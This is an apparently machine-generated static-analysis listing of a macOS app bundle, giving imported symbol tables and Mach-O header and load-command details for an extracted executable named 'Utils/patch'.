                                                                                                    _objc_retainAutoreleaseReturnValue
                                                                                                    _objc_retainAutoreleasedReturnValue
                                                                                                    _objc_retainBlock
                                                                                                    _objc_setAssociatedObject
                                                                                                    _objc_setProperty_atomic
                                                                                                    _objc_setProperty_nonatomic_copy
                                                                                                    _objc_storeStrong
                                                                                                    _objc_storeWeak
                                                                                                    _object_getClass
                                                                                                    _object_getIndexedIvars
                                                                                                    _object_getIvar
                                                                                                    _object_setIvar
                                                                                                    _pow
                                                                                                    _powf
                                                                                                    _printf
                                                                                                    _property_copyAttributeList
                                                                                                    _protocol_getMethodDescription
                                                                                                    _protocol_getName
                                                                                                    _pthread_mutex_lock
                                                                                                    _pthread_mutex_unlock
                                                                                                    _puts
                                                                                                    _round
                                                                                                    _roundf
                                                                                                    _sel_getUid
                                                                                                    _strcmp
                                                                                                    _strlen
                                                                                                    _strncmp
                                                                                                    _swift_arrayAssignWithTake
                                                                                                    _swift_arrayDestroy
                                                                                                    _swift_arrayInitWithCopy
                                                                                                    _swift_bridgeObjectRelease
                                                                                                    _swift_bridgeObjectRelease_n
                                                                                                    _swift_bridgeObjectRetain
                                                                                                    _swift_bridgeObjectRetain_n
                                                                                                    _swift_bufferAllocate
                                                                                                    _swift_deallocClassInstance
                                                                                                    _swift_deallocPartialClassInstance
                                                                                                    _swift_deletedMethodError
                                                                                                    _swift_dynamicCastMetatype
                                                                                                    _swift_dynamicCastObjCClass
                                                                                                    _swift_dynamicCastObjCClassUnconditional
                                                                                                    _swift_dynamicCastObjCProtocolConditional
                                                                                                    _swift_errorRelease
                                                                                                    _swift_errorRetain
                                                                                                    _swift_getForeignTypeMetadata
                                                                                                    _swift_getFunctionTypeMetadata
                                                                                                    _swift_getFunctionTypeMetadata1
                                                                                                    _swift_getObjCClassFromMetadata
                                                                                                    _swift_getObjCClassMetadata
                                                                                                    _swift_getObjectType
                                                                                                    _swift_getTupleTypeMetadata2
                                                                                                    _swift_initStackObject
                                                                                                    _swift_initStaticObject
                                                                                                    _swift_int64ToString
                                                                                                    _swift_isUniquelyReferencedNonObjC
                                                                                                    _swift_isUniquelyReferencedNonObjC_nonNull_bridgeObject
                                                                                                    _swift_isaMask
                                                                                                    _swift_once
                                                                                                    _swift_setDeallocating
                                                                                                    _swift_stdlib_CFSetGetValues
                                                                                                    _swift_stdlib_NSStringLowercaseString
                                                                                                    _swift_stdlib_NSStringUppercaseString
                                                                                                    _swift_unexpectedError
                                                                                                    _swift_unknownRelease
                                                                                                    _swift_unknownRelease_n
                                                                                                    _swift_unknownRetain
                                                                                                    _swift_unknownRetain_n
                                                                                                    _swift_unknownWeakAssign
                                                                                                    _swift_unknownWeakDestroy
                                                                                                    _swift_unknownWeakInit
                                                                                                    _swift_unknownWeakLoadStrong
                                                                                                    _usleep
                                                                                                    dyld_stub_binder
                                                                                                    radr://5614542
                                                                                                    External symbols
                                                                                                    _AUGraphAddNode
                                                                                                    _AUGraphConnectNodeInput
                                                                                                    _AUGraphInitialize
                                                                                                    _AUGraphNodeInfo
                                                                                                    _AUGraphOpen
                                                                                                    _AUGraphStart
                                                                                                    _AudioUnitSetParameter
                                                                                                    _CFDataGetBytes
                                                                                                    _CFDictionaryCreateMutable
                                                                                                    _CFDictionarySetValue
                                                                                                    _CFRelease
                                                                                                    _CFRunLoopGetCurrent
                                                                                                    _CFStringCreateWithFormat
                                                                                                    _CFStringGetCStringPtr
                                                                                                    _CGColorRelease
                                                                                                    _CGContextAddPath
                                                                                                    _CGContextFillPath
                                                                                                    _CGContextRestoreGState
                                                                                                    _CGContextRotateCTM
                                                                                                    _CGContextSaveGState
                                                                                                    _CGContextSetFillColorWithColor
                                                                                                    _CGContextSetShadowWithColor
                                                                                                    _CGContextSetShouldSmoothFonts
                                                                                                    _CGContextSetShouldSubpixelPositionFonts
                                                                                                    _CGContextSetShouldSubpixelQuantizeFonts
                                                                                                    _CGContextSetStrokeColorWithColor
                                                                                                    _CGContextSetTextDrawingMode
                                                                                                    _CGContextSetTextMatrix
                                                                                                    _CGContextSetTextPosition
                                                                                                    _CGContextStrokePath
                                                                                                    _CGContextTranslateCTM
                                                                                                    _CGPathAddLineToPoint
                                                                                                    _CGPathCreateMutable
                                                                                                    _CGPathMoveToPoint
                                                                                                    _CGPathRelease
                                                                                                    _CGRectContainsPoint
                                                                                                    _CGRectEqualToRect
                                                                                                    _CGRectGetHeight
                                                                                                    _CGRectGetMaxX
                                                                                                    _CGRectGetMaxY
                                                                                                    _CGRectGetMidX
                                                                                                    _CGRectGetMidY
                                                                                                    _CGRectGetMinX
                                                                                                    _CGRectGetMinY
                                                                                                    _CGRectGetWidth
                                                                                                    _CGRectInset
                                                                                                    _CGRectIntersection
                                                                                                    _CGRectIntersectsRect
                                                                                                    _CGRectOffset
                                                                                                    _CTFontCopyFontDescriptor
                                                                                                    _CTFontCreateWithFontDescriptor
                                                                                                    _CTFontDescriptorCreateCopyWithFeature
                                                                                                    _CTLineCreateWithAttributedString
                                                                                                    _CTLineDraw
                                                                                                    _GetCurrentKeyModifiers
                                                                                                    _GetVIPCode
                                                                                                    _IOIteratorNext
                                                                                                    _IOMasterPort
                                                                                                    _IOObjectRelease
                                                                                                    _IORegistryEntryCreateCFProperty
                                                                                                    _IORegistryEntryGetParentEntry
                                                                                                    _IORegistryEntrySearchCFProperty
                                                                                                    _IORegistryGetRootEntry
                                                                                                    _IOServiceGetMatchingServices
                                                                                                    _IOServiceMatching
                                                                                                    _LSFindApplicationForInfo
                                                                                                    _MDItemCopyAttribute
                                                                                                    _MDItemCreate
                                                                                                    _MIKAudioFileDispose
                                                                                                    _MIKAudioFileGetFileStreamFormat
                                                                                                    _MIKAudioFileGetLengthFrames
                                                                                                    _MIKAudioFileOpen
                                                                                                    _MIKAudioFilePrintError
                                                                                                    _MIKAudioFileRead
                                                                                                    _MIKAudioFileSetReadStreamFormat
                                                                                                    _MIKAudioSpectrumCopy
                                                                                                    _MIKAudioSpectrumCreate
                                                                                                    _MIKAudioSpectrumDispose
                                                                                                    _MIKCGColorCreateFromNSColor
                                                                                                    _MIKDetectCuePointInfo
                                                                                                    _MIKEnergeticAdjustBeatmarks
                                                                                                    _MIKExtAudioFileGetBitrate
                                                                                                    _MIKFLACAudioFileGetDuration
                                                                                                    _MIKIndexForCamelotKey
                                                                                                    _MIKIndexForKey
                                                                                                    _MIKIsEnergyString
                                                                                                    _MIKIsEnergyString1
                                                                                                    _MIKIsKeyString
                                                                                                    _MIKIsTempoString
                                                                                                    _MIKKeyNames
                                                                                                    _MIKKeyString
                                                                                                    _MIKKeysString
                                                                                                    _MIKMajorIndexForCamelotKey
                                                                                                    _MIKMinorIndexForCamelotKey
                                                                                                    _MIKTagArtistFromPath
                                                                                                    _MIKTagNameFromPath
                                                                                                    _NSApplicationMain
                                                                                                    _NSBeep
                                                                                                    _NSClassFromString
                                                                                                    _NSDivideRect
                                                                                                    _NSEqualRects
                                                                                                    _NSEqualSizes
                                                                                                    _NSFileTypeForHFSTypeCode
                                                                                                    _NSFrameRect
                                                                                                    _NSFrameRectWithWidthUsingOperation
                                                                                                    _NSInsetRect
                                                                                                    _NSIntegralRect
                                                                                                    _NSIntersectionRect
                                                                                                    _NSIntersectsRect
                                                                                                    _NSIsEmptyRect
                                                                                                    _NSLog
                                                                                                    _NSMouseInRect
                                                                                                    _NSOffsetRect
                                                                                                    _NSPointInRect
                                                                                                    _NSRectFill
                                                                                                    _NSRectFillUsingOperation
                                                                                                    _NSSearchPathForDirectoriesInDomains
                                                                                                    _NSSelectorFromString
                                                                                                    _NSStringFromSelector
                                                                                                    _NSUnionRect
                                                                                                    _NewAUGraph
                                                                                                    _SCNetworkReachabilityCreateWithName
                                                                                                    _SCNetworkReachabilityScheduleWithRunLoop
                                                                                                    _SCNetworkReachabilitySetCallback
                                                                                                    _SCNetworkReachabilityUnscheduleFromRunLoop
                                                                                                    _SetVIPCode
                                                                                                    __Block_copy
                                                                                                    __Block_object_assign
                                                                                                    __Block_object_dispose
                                                                                                    __Block_release
                                                                                                    __T010Foundation10NSNotFoundSivau
                                                                                                    __T010Foundation12CharacterSetVACSS12charactersIn_tcfC
                                                                                                    __T010Foundation12NotificationV19_bridgeToObjectiveCSo14NSNotificationCyF
                                                                                                    __T010Foundation12NotificationV36_unconditionallyBridgeFromObjectiveCACSo14NSNotificationCSgFZ
                                                                                                    __T010Foundation15AffineTransformV19_bridgeToObjectiveCSo08NSAffineC0CyF
                                                                                                    __T010Foundation15AffineTransformV9translatey12CoreGraphics7CGFloatV1x_AG1ytF
                                                                                                    __T010Foundation15AffineTransformVACycfC
                                                                                                    __T010Foundation17NSLocalizedStringS2S_SSSg9tableNameSo6BundleC6bundleSS5valueSS7commenttF
                                                                                                    __T010Foundation17NSLocalizedStringS2S_SSSg9tableNameSo6BundleC6bundleSS5valueSS7commenttFfA0_
                                                                                                    __T010Foundation17NSLocalizedStringS2S_SSSg9tableNameSo6BundleC6bundleSS5valueSS7commenttFfA1_
                                                                                                    __T010Foundation17NSLocalizedStringS2S_SSSg9tableNameSo6BundleC6bundleSS5valueSS7commenttFfA2_
                                                                                                    __T010Foundation22_convertErrorToNSErrorSo0E0Cs0C0_pF
                                                                                                    __T010Foundation22_convertNSErrorToErrors0E0_pSo0C0CSgF
                                                                                                    __T010Foundation3URLV17lastPathComponentSSvg
                                                                                                    __T010Foundation3URLV19_bridgeToObjectiveCSo5NSURLCyF
                                                                                                    __T010Foundation3URLV22appendingPathComponentACSSF
                                                                                                    __T010Foundation3URLV2eeoiSbAC_ACtFZ
                                                                                                    __T010Foundation3URLV35stopAccessingSecurityScopedResourceyyF
                                                                                                    __T010Foundation3URLV36_unconditionallyBridgeFromObjectiveCACSo5NSURLCSgFZ
                                                                                                    __T010Foundation3URLV36startAccessingSecurityScopedResourceSbyF
                                                                                                    __T010Foundation3URLV4pathSSvg
                                                                                                    __T010Foundation3URLV9hashValueSivg
                                                                                                    __T010Foundation3URLVACSS15fileURLWithPath_tcfC
                                                                                                    __T010Foundation3URLVACSgSS6string_tcfC
                                                                                                    __T010Foundation4DataV19_bridgeToObjectiveCSo6NSDataCyF
                                                                                                    __T010Foundation4DataV2eeoiSbAC_ACtFZ
                                                                                                    __T010Foundation4DataV36_unconditionallyBridgeFromObjectiveCACSo6NSDataCSgFZ
                                                                                                    __T010Foundation4DateV19_bridgeToObjectiveCSo6NSDateCyF
                                                                                                    __T010Foundation4DateV36_unconditionallyBridgeFromObjectiveCACSo6NSDateCSgFZ
                                                                                                    __T010Foundation4DateV7compareSC16ComparisonResultOACF
                                                                                                    __T010Foundation4DateVACycfC
                                                                                                    __T010Foundation5NSLogySS_s7CVarArg_pdtF
                                                                                                    __T010Foundation6LocaleV7currentACvgZ
                                                                                                    __T010Foundation8IndexSetV19_bridgeToObjectiveCSo07NSIndexC0CyF
                                                                                                    __T010Foundation8IndexSetVACSi7integer_tcfC
                                                                                                    __T010Foundation8IndexSetVACs14CountableRangeVySiG10integersIn_tcfC
                                                                                                    __T010ObjectiveC22_convertBoolToObjCBoolAA0eF0VSbF
                                                                                                    __T010ObjectiveC22_convertObjCBoolToBoolSbAA0cD0VF
                                                                                                    __T010ObjectiveC2eeoiSbAA8SelectorV_ADtF
                                                                                                    __T010ObjectiveC2eeoiSbSo8NSObjectC_ADtF
                                                                                                    __T012CoreGraphics7CGFloatV6negateyyF
                                                                                                    __T06Darwin5noErrs5Int32Vvg
                                                                                                    __T08Dispatch0A13WorkItemFlagsVACSu8rawValue_tcfC
                                                                                                    __T08Dispatch0A3QoSV11unspecifiedACvau
                                                                                                    __T0SC6CGRectV6AppKitE4fillySC22NSCompositingOperationO5using_tF
                                                                                                    __T0SC6CGRectV6AppKitE5framey12CoreGraphics7CGFloatV9withWidth_SC22NSCompositingOperationO5usingtF
                                                                                                    __T0SQMa
                                                                                                    __T0SS10FoundationE19_bridgeToObjectiveCSo8NSStringCyF
                                                                                                    __T0SS10FoundationE25localizedStringWithFormatS2S_s7CVarArg_pdtFZ
                                                                                                    __T0SS10FoundationE26_forceBridgeFromObjectiveCySo8NSStringC_SSSgz6resulttFZ
                                                                                                    __T0SS10FoundationE34_conditionallyBridgeFromObjectiveCSbSo8NSStringC_SSSgz6resulttFZ
                                                                                                    __T0SS10FoundationE36_unconditionallyBridgeFromObjectiveCSSSo8NSStringCSgFZ
                                                                                                    __T0SS14_CharacterViewV42_measureExtendedGraphemeClusterForwardSlowS2i11startOffset_tF
                                                                                                    __T0SS14_CharacterViewV43_measureExtendedGraphemeClusterBackwardSlowS2i9endOffset_tF
                                                                                                    __T0SS15reserveCapacityySiF
                                                                                                    __T0SS23_bridgeToObjectiveCImplyXlyF
                                                                                                    __T0SS37_compareDeterministicUnicodeCollationSiSSF
                                                                                                    __T0SS8UTF8ViewV12makeIteratorAB0D0VyF
                                                                                                    __T0SS8UTF8ViewV8IteratorV4nexts5UInt8VSgyF
                                                                                                    __T0Sa10FoundationE19_bridgeToObjectiveCSo7NSArrayCyF
                                                                                                    __T0Sa10FoundationE36_unconditionallyBridgeFromObjectiveCSayxGSo7NSArrayCSgFZ
                                                                                                    __T0SaMa
                                                                                                    __T0Sb10FoundationE19_bridgeToObjectiveCSo8NSNumberCyF
                                                                                                    __T0Sd10FoundationE19_bridgeToObjectiveCSo8NSNumberCyF
                                                                                                    __T0Sf10FoundationE19_bridgeToObjectiveCSo8NSNumberCyF
                                                                                                    __T0Sf10FoundationE26_forceBridgeFromObjectiveCySo8NSNumberC_SfSgz6resulttFZ
                                                                                                    __T0Sf10FoundationE34_conditionallyBridgeFromObjectiveCSbSo8NSNumberC_SfSgz6resulttFZ
                                                                                                    __T0Sf10FoundationE36_unconditionallyBridgeFromObjectiveCSfSo8NSNumberCSgFZ
                                                                                                    __T0Si10FoundationE19_bridgeToObjectiveCSo8NSNumberCyF
                                                                                                    __T0Si10FoundationE26_forceBridgeFromObjectiveCySo8NSNumberC_SiSgz6resulttFZ
                                                                                                    __T0Si10FoundationE34_conditionallyBridgeFromObjectiveCSbSo8NSNumberC_SiSgz6resulttFZ
                                                                                                    __T0Si10FoundationE36_unconditionallyBridgeFromObjectiveCSiSo8NSNumberCSgFZ
                                                                                                    __T0So11NSPredicateC10FoundationEABSS6format_s7CVarArg_pdtcfC
                                                                                                    __T0So13DispatchQueueC0A0E4mainABvgZ
                                                                                                    __T0So13DispatchQueueC0A0E5asyncySo0A5GroupCSg5group_AC0A3QoSV3qosAC0A13WorkItemFlagsV5flagsyyXB7executetF
                                                                                                    __T0So13DispatchQueueC0A0E6globalA2bCE06GlobalB8PriorityO8priority_tFZ
                                                                                                    __T0So7NSSoundC6AppKitE4beepyyFZ
                                                                                                    __T0SqMa
                                                                                                    __T0s019_cocoaStringToSwiftB9_NonASCIISSyXlF
                                                                                                    __T0s10DictionaryV10FoundationE19_bridgeToObjectiveCSo12NSDictionaryCyF
                                                                                                    __T0s10DictionaryV10FoundationE36_unconditionallyBridgeFromObjectiveCAByxq_GSo12NSDictionaryCSgFZ
                                                                                                    __T0s10DictionaryVMa
                                                                                                    __T0s10SetAlgebraPsExqd__cs8SequenceRd__7ElementQyd__ADRtzlufC
                                                                                                    __T0s11_StringCoreV12_copyInPlaceySi7newSize_Si0F8CapacitySi15minElementWidthtF
                                                                                                    __T0s11_StringCoreV6appendys6UInt16V_AESgtF
                                                                                                    __T0s11_hashStringSiSSF
                                                                                                    __T0s13ManagedBufferCMa
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE10componentsSaySSGAC12CharacterSetV11separatedBy_tF
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE10lowercasedSSAC6LocaleVSg4with_tF
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE10uppercasedSSAC6LocaleVSg4with_tF
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE11capitalizedSSAC6LocaleVSg4with_tF
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE19replacingCharactersSSqd_0_2in_qd__4withtsAARd__s15RangeExpressionRd_0_AE5BoundRtd_0_r0_lF
                                                                                                    __T0s14StringProtocolP10FoundationSS5IndexVADRtzrlE22caseInsensitiveCompareSC16ComparisonResultOqd__sAARd__lF
                                                                                                    __T0s14_int64ToStringSSs5Int64V_AC5radixSb9uppercasetF
                                                                                                    __T0s15_print_unlockedyx_q_zts16TextOutputStreamR_r0_lF
                                                                                                    __T0s17FlattenCollectionV19underestimatedCountSivg
                                                                                                    __T0s17FlattenCollectionVMa
                                                                                                    __T0s17LazyMapCollectionVMa
                                                                                                    __T0s17LazyMapCollectionVyxq_Gs0C0sWa
                                                                                                    __T0s17_CocoaSetIteratorC24_fastEnumerationStatePtrSpySC012_SwiftNSFasteF0VGvg
                                                                                                    __T0s17_CocoaSetIteratorC27_fastEnumerationStackBufPtrSpys01_a4FastefG0VGvg
                                                                                                    __T0s17_CocoaSetIteratorCMa
                                                                                                    __T0s17_HeapBufferHeaderVMa
                                                                                                    __T0s17_cocoaStringSlices01_B4CoreVAC_s5RangeVySiGtF
                                                                                                    __T0s19_cocoaStringReadAllyyXl_Spys6UInt16VGtF
                                                                                                    __T0s19_emptyStringStorages6UInt32Vvau
                                                                                                    __T0s20_ConcreteHashableBoxVMa
                                                                                                    __T0s21_cocoaStringSubscripts6UInt16Vs01_B4CoreV_SitF
                                                                                                    __T0s21_findStringSwitchCaseSiSays06StaticB0VG5cases_SS6stringtF
                                                                                                    __T0s23_ContiguousArrayStorageCMa
                                                                                                    __T0s24_CocoaDictionaryIteratorCMa
                                                                                                    __T0s27_ContiguousArrayStorageBaseC17staticElementTypeypXpvg
                                                                                                    __T0s27_ContiguousArrayStorageBaseCMa
                                                                                                    __T0s27_bridgeAnythingToObjectiveCyXlxlF
                                                                                                    __T0s30_HashableTypedNativeSetStorageCMa
                                                                                                    __T0s32_bridgeNonVerbatimFromObjectiveCyyXl_xmxSgztlF
                                                                                                    __T0s37_HashableTypedNativeDictionaryStorageCMa
                                                                                                    __T0s38_bridgeAnythingNonVerbatimToObjectiveCyXlxlF
                                                                                                    __T0s3SetV10FoundationE19_bridgeToObjectiveCSo5NSSetCyF
                                                                                                    __T0s3SetV10FoundationE36_unconditionallyBridgeFromObjectiveCAByxGSo5NSSetCSgFZ
                                                                                                    __T0s3SetVMa
                                                                                                    __T0s5RangeVMa
                                                                                                    __T0s5RangeVyxGs0A10ExpressionsWa
                                                                                                    __T0s5printyypd_SS9separatorSS10terminatortF
                                                                                                    __T0s5printyypd_SS9separatorSS10terminatortFfA0_
                                                                                                    __T0s5printyypd_SS9separatorSS10terminatortFfA1_
                                                                                                    __Unwind_Resume
                                                                                                    ___assert_rtn
                                                                                                    ___bzero
                                                                                                    ___sincos_stret
                                                                                                    ___stack_chk_fail
                                                                                                    __dyld_register_func_for_add_image
                                                                                                    __stdlib_malloc_size
                                                                                                    __stdlib_memcmp
                                                                                                    __swift_makeAnyHashableUpcastingToHashableBaseType
                                                                                                    __swift_stdlib_operatingSystemVersion
                                                                                                    __swift_stdlib_reportUnimplementedInitializer
                                                                                                    _abort
                                                                                                    _asprintf
                                                                                                    _bzero
                                                                                                    _calloc
                                                                                                    _ceil
                                                                                                    _ceilf
                                                                                                    _class_addMethod
                                                                                                    _class_addProperty
                                                                                                    _class_addProtocol
                                                                                                    _class_getInstanceMethod
                                                                                                    _class_getInstanceSize
                                                                                                    _class_getInstanceVariable
                                                                                                    _class_getIvarLayout
                                                                                                    _class_getSuperclass
                                                                                                    _class_isMetaClass
                                                                                                    _class_replaceMethod
                                                                                                    _class_respondsToSelector
                                                                                                    _dispatch_after
                                                                                                    _dispatch_async
                                                                                                    _dispatch_get_global_queue
                                                                                                    _dispatch_once
                                                                                                    _dispatch_queue_create
                                                                                                    _dispatch_sync
                                                                                                    _dispatch_time
                                                                                                    _div
                                                                                                    _dlclose
                                                                                                    _dlopen
                                                                                                    _fflush
                                                                                                    _floor
                                                                                                    _floorf
                                                                                                    _free
                                                                                                    _hash_create
                                                                                                    _hash_search
                                                                                                    _ivar_getName
                                                                                                    _ivar_getOffset
                                                                                                    _ldexp
                                                                                                    _llroundf
                                                                                                    _log10
                                                                                                    _log10f
                                                                                                    _lround
                                                                                                    _lroundf
                                                                                                    _mach_port_deallocate
                                                                                                    _malloc
                                                                                                    _memcpy
                                                                                                    _memmove
                                                                                                    _method_setImplementation
                                                                                                    _objc_allocWithZone
                                                                                                    _objc_autorelease
                                                                                                    _objc_autoreleasePoolPop
                                                                                                    _objc_autoreleasePoolPush
                                                                                                    _objc_autoreleaseReturnValue
                                                                                                    _objc_begin_catch
                                                                                                    _objc_constructInstance
                                                                                                    _objc_copyWeak
                                                                                                    _objc_destroyWeak
                                                                                                    _objc_end_catch
                                                                                                    _objc_enumerationMutation
                                                                                                    _objc_exception_rethrow
                                                                                                    _objc_getAssociatedObject
                                                                                                    _objc_getClass
                                                                                                    _objc_getMetaClass
                                                                                                    _objc_getProperty
                                                                                                    _objc_getProtocol
                                                                                                    _objc_getRequiredClass
                                                                                                    _objc_initWeak
                                                                                                    _objc_initializeClassPair
                                                                                                    _objc_loadWeakRetained
                                                                                                    _objc_lookUpClass
                                                                                                    _objc_msgSend
                                                                                                    _objc_msgSendSuper2
                                                                                                    _objc_msgSendSuper2_stret
                                                                                                    _objc_msgSend_stret
                                                                                                    _objc_registerClassPair
                                                                                                    _objc_release
                                                                                                    _objc_retain
                                                                                                    _objc_retainAutorelease
                                                                                                    _objc_retainAutoreleaseReturnValue
                                                                                                    _objc_retainAutoreleasedReturnValue
                                                                                                    _objc_retainBlock
                                                                                                    _objc_setAssociatedObject
                                                                                                    _objc_setProperty_atomic
                                                                                                    _objc_setProperty_nonatomic_copy
                                                                                                    _objc_storeStrong
                                                                                                    _objc_storeWeak
                                                                                                    _object_getClass
                                                                                                    _object_getIvar
                                                                                                    _object_setIvar
                                                                                                    _pow
                                                                                                    _powf
                                                                                                    _printf
                                                                                                    _property_copyAttributeList
                                                                                                    _protocol_getMethodDescription
                                                                                                    _pthread_mutex_lock
                                                                                                    _pthread_mutex_unlock
                                                                                                    _puts
                                                                                                    _round
                                                                                                    _roundf
                                                                                                    _sel_getUid
                                                                                                    _strcmp
                                                                                                    _strlen
                                                                                                    _strncmp
                                                                                                    _swift_arrayAssignWithTake
                                                                                                    _swift_arrayDestroy
                                                                                                    _swift_arrayInitWithCopy
                                                                                                    _swift_bridgeObjectRelease
                                                                                                    _swift_bridgeObjectRelease_n
                                                                                                    _swift_bridgeObjectRetain
                                                                                                    _swift_bridgeObjectRetain_n
                                                                                                    _swift_bufferAllocate
                                                                                                    _swift_deallocClassInstance
                                                                                                    _swift_deallocPartialClassInstance
                                                                                                    _swift_dynamicCastMetatype
                                                                                                    _swift_dynamicCastObjCClass
                                                                                                    _swift_dynamicCastObjCClassUnconditional
                                                                                                    _swift_dynamicCastObjCProtocolConditional
                                                                                                    _swift_errorRelease
                                                                                                    _swift_errorRetain
                                                                                                    _swift_getForeignTypeMetadata
                                                                                                    _swift_getFunctionTypeMetadata
                                                                                                    _swift_getFunctionTypeMetadata1
                                                                                                    _swift_getObjCClassFromMetadata
                                                                                                    _swift_getObjCClassMetadata
                                                                                                    _swift_getObjectType
                                                                                                    _swift_getTupleTypeMetadata2
                                                                                                    _swift_initStackObject
                                                                                                    _swift_initStaticObject
                                                                                                    _swift_int64ToString
                                                                                                    _swift_isUniquelyReferencedNonObjC
                                                                                                    _swift_isUniquelyReferencedNonObjC_nonNull_bridgeObject
                                                                                                    _swift_once
                                                                                                    _swift_setDeallocating
                                                                                                    _swift_stdlib_CFSetGetValues
                                                                                                    _swift_stdlib_NSStringLowercaseString
                                                                                                    _swift_stdlib_NSStringUppercaseString
                                                                                                    _swift_unexpectedError
                                                                                                    _swift_unknownRelease
                                                                                                    _swift_unknownRelease_n
                                                                                                    _swift_unknownRetain
                                                                                                    _swift_unknownRetain_n
                                                                                                    _swift_unknownWeakAssign
                                                                                                    _swift_unknownWeakDestroy
                                                                                                    _swift_unknownWeakInit
                                                                                                    _swift_unknownWeakLoadStrong
                                                                                                    _usleep
                                                                                                    Extracted File
                                                                                                    File path:Utils/patch
                                                                                                    File size:87920
                                                                                                    File type:Mach-O 64-bit executable
                                                                                                    Static Mach Info
                                                                                                    General Information for header 1
                                                                                                    Endian:<
                                                                                                    Size:64-bit
                                                                                                    Architecture:x86_64
                                                                                                    Filetype:execute
                                                                                                    Nbr. of load commands:18
                                                                                                    Entry point:0xBD80
                                                                                                    segment_command_64 aggregated: 4
                                                                                                    NameValue
                                                                                                    segname__PAGEZERO
                                                                                                    vmaddr0x0
                                                                                                    vmsize0x100000000
                                                                                                    fileoff0x0
                                                                                                    filesize0x0
                                                                                                    maxprot0x0
                                                                                                    initprot0x0
                                                                                                    nsects0
                                                                                                    flags0x0
                                                                                                    NameValue
                                                                                                    segname__TEXT
                                                                                                    vmaddr0x100000000
                                                                                                    vmsize0x13000
                                                                                                    fileoff0x0
                                                                                                    filesize0x13000
                                                                                                    maxprot0x5
                                                                                                    initprot0x5
                                                                                                    nsects6
                                                                                                    flags0x0
                                                                                                    Datas
                                                                                                    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
                                                                                                    __text__TEXT0x100000C200xF1C50xC200x40x000x80000400
                                                                                                    __stubs__TEXT0x10000FDE60x21C0xFDE60x10x000x80000408
                                                                                                    __stub_helper__TEXT0x1000100040x3940x100040x20x000x80000400
                                                                                                    __const__TEXT0x1000103A00x20D0x103A00x40x000x0
                                                                                                    __cstring__TEXT0x1000105AD0x2A090x105AD0x00x000x2
                                                                                                    __unwind_info__TEXT0x100012FB80x480x12FB80x20x000x0
                                                                                                    NameValue
                                                                                                    segname__DATA
                                                                                                    vmaddr0x100013000
                                                                                                    vmsize0x1000
                                                                                                    fileoff0x13000
                                                                                                    filesize0x1000
                                                                                                    maxprot0x3
                                                                                                    initprot0x3
                                                                                                    nsects7
                                                                                                    flags0x0
                                                                                                    Datas
                                                                                                    sectnamesegnameaddrsizeoffsetalignreloffnrelocflags
                                                                                                    __nl_symbol_ptr__DATA0x1000130000x80x130000x30x000x6
                                                                                                    __got__DATA0x1000130080x280x130080x30x000x6
                                                                                                    __la_symbol_ptr__DATA0x1000130300x2D00x130300x30x000x7
                                                                                                    __const__DATA0x1000133000x3400x133000x40x000x0
                                                                                                    __cfstring__DATA0x1000136400x200x136400x30x000x0
                                                                                                    __data__DATA0x1000136600xA80x136600x40x000x0
                                                                                                    __common__DATA0x1000137080x380x00x30x000x1
                                                                                                    NameValue
                                                                                                    segname__LINKEDIT
                                                                                                    vmaddr0x100014000
                                                                                                    vmsize0x1770
                                                                                                    fileoff0x14000
                                                                                                    filesize0x1770
                                                                                                    maxprot0x1
                                                                                                    initprot0x1
                                                                                                    nsects0
                                                                                                    flags0x0
                                                                                                    dyld_info_command aggregated: 1
                                                                                                    NameValue
                                                                                                    rebase_off81920
                                                                                                    rebase_size24
                                                                                                    bind_off81944
                                                                                                    bind_size168
                                                                                                    weak_bind_off0
                                                                                                    weak_bind_size0
                                                                                                    lazy_bind_off82112
                                                                                                    lazy_bind_size1760
                                                                                                    export_off83872
                                                                                                    export_size3040
                                                                                                    symtab_command aggregated: 1
                                                                                                    NameValue
                                                                                                    symoff87168
                                                                                                    nsyms0
                                                                                                    stroff87912
                                                                                                    strsize8
                                                                                                    dysymtab_command aggregated: 1
                                                                                                    NameValue
                                                                                                    ilocalsym0
                                                                                                    nlocalsym0
                                                                                                    iextdefsym0
                                                                                                    nextdefsym0
                                                                                                    iundefsym0
                                                                                                    nundefsym0
                                                                                                    tocoff0
                                                                                                    ntoc0
                                                                                                    modtaboff0
                                                                                                    nmodtab0
                                                                                                    extrefsymoff0
                                                                                                    nextrefsyms0
                                                                                                    indirectsymoff87168
                                                                                                    nindirectsyms186
                                                                                                    extreloff0
                                                                                                    nextrel0
                                                                                                    locreloff0
                                                                                                    nlocrel0
                                                                                                    dylinker_command aggregated: 1
                                                                                                    NameValue
                                                                                                    name12
                                                                                                    Datas/usr/lib/dyld
                                                                                                    uuid_command aggregated: 1
                                                                                                    NameValue
                                                                                                    uuidb'3\xdd\x1b+\rB81\xac\x82\xc7\tU/\xe5\xf6'
                                                                                                    version_min_command aggregated: 1
                                                                                                    NameValue
                                                                                                    version657920
                                                                                                    sdk659200
                                                                                                    source_version_command aggregated: 1
                                                                                                    NameValue
                                                                                                    version0
                                                                                                    entry_point_command aggregated: 1
                                                                                                    NameValue
                                                                                                    entryoff48512
                                                                                                    stacksize0
                                                                                                    dylib_command aggregated: 4
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1281.0.0
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/usr/lib/libSystem.B.dylib
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1673.126.0
                                                                                                    compatibility_version150.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version1348.12.4
                                                                                                    compatibility_version64.0.0
                                                                                                    Datas/System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics
                                                                                                    NameValue
                                                                                                    name24
                                                                                                    timestampThu Jan 1 01:00:02 1970
                                                                                                    current_version59306.41.2
                                                                                                    compatibility_version1.0.0
                                                                                                    Datas/System/Library/Frameworks/Security.framework/Versions/A/Security
                                                                                                    linkedit_data_command aggregated: 2
                                                                                                    NameValue
                                                                                                    dataoff86912
